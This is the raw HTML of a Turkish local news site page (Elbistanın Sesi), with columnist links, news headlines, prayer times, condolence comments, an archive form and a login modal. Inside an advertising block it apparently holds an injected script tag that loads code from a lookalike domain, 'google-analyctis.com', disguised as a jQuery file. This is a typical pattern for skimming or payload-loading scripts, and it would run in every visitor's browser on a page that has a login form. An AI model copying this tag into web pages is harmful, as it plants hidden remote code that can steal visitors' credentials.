                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="http://www.elbistaninsesi.com/asimin-nesli-makale,6121.html" title="   ASIM’IN NESLİ!..." >   ASIM’IN NESLİ!...</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bahar-turkusu-makale,6120.html" title="BAHAR TÜRKÜSÜ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/d985fcce-69b5-47bf-99fe-3c82dc92b125.jpg" alt="Akif DUT">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/91/akif-dut" title="Akif DUT">Akif DUT</a></h4>
              <a href="http://www.elbistaninsesi.com/bahar-turkusu-makale,6120.html" title="BAHAR TÜRKÜSÜ" >BAHAR TÜRKÜSÜ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hemsehrimiz-hasan-resit-tankut-ve-elbistan-adinin-gunes-dil-teorisine-gore-tahlili-makale,6111.html" title="Hemşehrimiz Hasan Reşit Tankut ve ‘Elbistan’ adının Güneş-Dil Teorisi’ne göre tahlili" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Omer-Hakan-Ozalp_009_1.jpg" alt="Ömer Hakan Özalp">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/42/omer-hakan-ozalp" title="Ömer Hakan Özalp">Ömer Hakan Özalp</a></h4>
              <a href="http://www.elbistaninsesi.com/hemsehrimiz-hasan-resit-tankut-ve-elbistan-adinin-gunes-dil-teorisine-gore-tahlili-makale,6111.html" title="Hemşehrimiz Hasan Reşit Tankut ve ‘Elbistan’ adının Güneş-Dil Teorisi’ne göre tahlili" >Hemşehrimiz Hasan Reşit Tankut ve ‘Elbistan’ adının Güneş-Dil Teorisi’ne göre tahlili</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hanefi-avciyi-dinlerken-makale,6109.html" title="HANEFİ AVCI’YI DİNLERKEN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="http://www.elbistaninsesi.com/hanefi-avciyi-dinlerken-makale,6109.html" title="HANEFİ AVCI’YI DİNLERKEN" >HANEFİ AVCI’YI DİNLERKEN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hoscakal-elbistan-makale,6088.html" title="Hoşçakal Elbistan" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr_kaya.jpg" alt="Dr. Mustafa Emrah Kaya / Beyin ve Sinir Cerrahı Uzmanı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/87/dr-mustafa-emrah-kaya-beyin-ve-sinir-cerrahi-uzmani" title="Dr. Mustafa Emrah Kaya / Beyin ve Sinir Cerrahı Uzmanı">Dr. Mustafa Emrah Kaya / Beyin ve Sinir Cerrahı Uzmanı</a></h4>
              <a href="http://www.elbistaninsesi.com/hoscakal-elbistan-makale,6088.html" title="Hoşçakal Elbistan" >Hoşçakal Elbistan</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/insan-eliyle-yok-olmaya-giden-dunyamiz-makale,6069.html" title="İNSAN ELİYLE YOK OLMAYA GİDEN DÜNYAMIZ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/20200824_110258.jpg" alt="Fatih Gözüaçık">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/86/fatih-gozuacik" title="Fatih Gözüaçık">Fatih Gözüaçık</a></h4>
              <a href="http://www.elbistaninsesi.com/insan-eliyle-yok-olmaya-giden-dunyamiz-makale,6069.html" title="İNSAN ELİYLE YOK OLMAYA GİDEN DÜNYAMIZ" >İNSAN ELİYLE YOK OLMAYA GİDEN DÜNYAMIZ</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-valiligi-artan-vakalara-karsi-uyardi-h69744.html" title="Kahramanmaraş Valiliği artan vakalara karşı uyardı" >Kahramanmaraş Valiliği artan vakalara karşı uyardı</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kiz-cocuguna-cinsel-istismar-iddiasinda-7-supheli-tutuklandi-h69718.html" title="Kız çocuğuna cinsel istismar iddiasında 7 şüpheli tutuklandı" ><b>Kız çocuğuna cinsel istismar iddiasında 7 şüpheli tutuklandı</b></a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/dusen-helikopterde-afsinli-asker-sehit-oldu-h69425.html" title="Düşen helikopterde Afşinli asker şehit oldu" >Düşen helikopterde Afşinli asker şehit oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-covidle-mucadelede-hassas-bir-doneme-girdik-h68360.html" title="Kaymakam Demir: “Covid’le mücadelede hassas bir döneme girdik”" >Kaymakam Demir: “Covid’le mücadelede hassas bir döneme girdik”</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/rehavete-kapilip-uyarilara-kulak-tikayanlara-ceza-yagdi-h68101.html" title="Rehavete kapılıp uyarılara kulak tıkayanlara ceza yağdı" >Rehavete kapılıp uyarılara kulak tıkayanlara ceza yağdı</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>04:37</td>
            <td>06:01</td>
            <td>12:39</td>
            <td>16:16</td>
            <td>19:08</td>
            <td>20:26</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/bekir-karalar-54-yasinda-h69763.html#comment_345074" title="" >komşum bekire Allah rahmet eylesın sevenlerinin...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-tahsin-seran-h69772.html#comment_345073" title="" >Allah rahmet eylesin. Mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/bekir-karalar-54-yasinda-h69763.html#comment_345072" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-tahsin-seran-h69772.html#comment_345070" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/serif-uzman-64-yasinda-h69679.html#comment_345069" title="" >ALLAH RAHMET EYLESİN MEKANİ CENNET OLSUN...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ipek-defne-mavi-h69752.html#comment_345068" title="" >Allah rahmet eylesin</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ipek-defne-mavi-h69752.html#comment_345067" title="" >Allah rahmet eylesin</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ipek-defne-mavi-h69752.html#comment_345066" title="" >Allah rahmet eylesin</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ipek-defne-mavi-h69752.html#comment_345065" title="" >Allah rahmet eylesin</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ipek-defne-mavi-h69752.html#comment_345064" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hafizali-gul-94-yasinda-h69761.html#comment_345060" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sultan-yuce-75-yasinda-h69764.html#comment_345059" title="" >merhumeye Allah tan rahmet ailesi ve yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/bekir-karalar-54-yasinda-h69763.html#comment_345057" title="" >merhuma Allah tan rahmet ailesi ve yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-zedeli-h69710.html#comment_345056" title="" >ALLAH RAHMET EYLESİN MEKANİ CENNET OLSUN...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/dogan-kozan-h69412.html#comment_345055" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/serif-uzman-64-yasinda-h69679.html#comment_345051" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/suleyman-savo-karagoz-88-yasinda-h69709.html#comment_345050" title="" >Allah rahmet eylesin.Mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ipek-defne-mavi-h69752.html#comment_345049" title="" >Allah rahmet eylesin . Mekanı cennettir...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-tahsin-seran-h69772.html#comment_345048" title="" >ALLAH rahmet eylesin mekanı cennet olsun...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-jandarma-cavus-mehmet-inan-h69765.html#comment_345047" title="" >Rabbim şehadetini kabul etsin mekanı cennet...</a></li>
              </ul>
    </div>
  </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="http://www.elbistaninsesi.com/images/sayfalar/5-Nisan-2021.jpg" title="Elbistanın Sesi - 05.04.2021 Manşeti" target="_blank"><img src="http://www.elbistaninsesi.com/images/sayfalar/thumb_5-Nisan-2021.jpg" alt="Elbistanın Sesi - 05.04.2021 Manşeti" /></a>
           </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" selected>08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" selected>Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Kentpark AVM, Ramazan ayını kampanyalarla karşılıyor" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="e98c858b809a9d888780879a8c9a808e88938c9d8c9a80a98e84888085c78a8684">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&amp;rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fkentpark-avm-ramazan-ayini-kampanyalarla-karsiliyor-h69777.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('69777', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
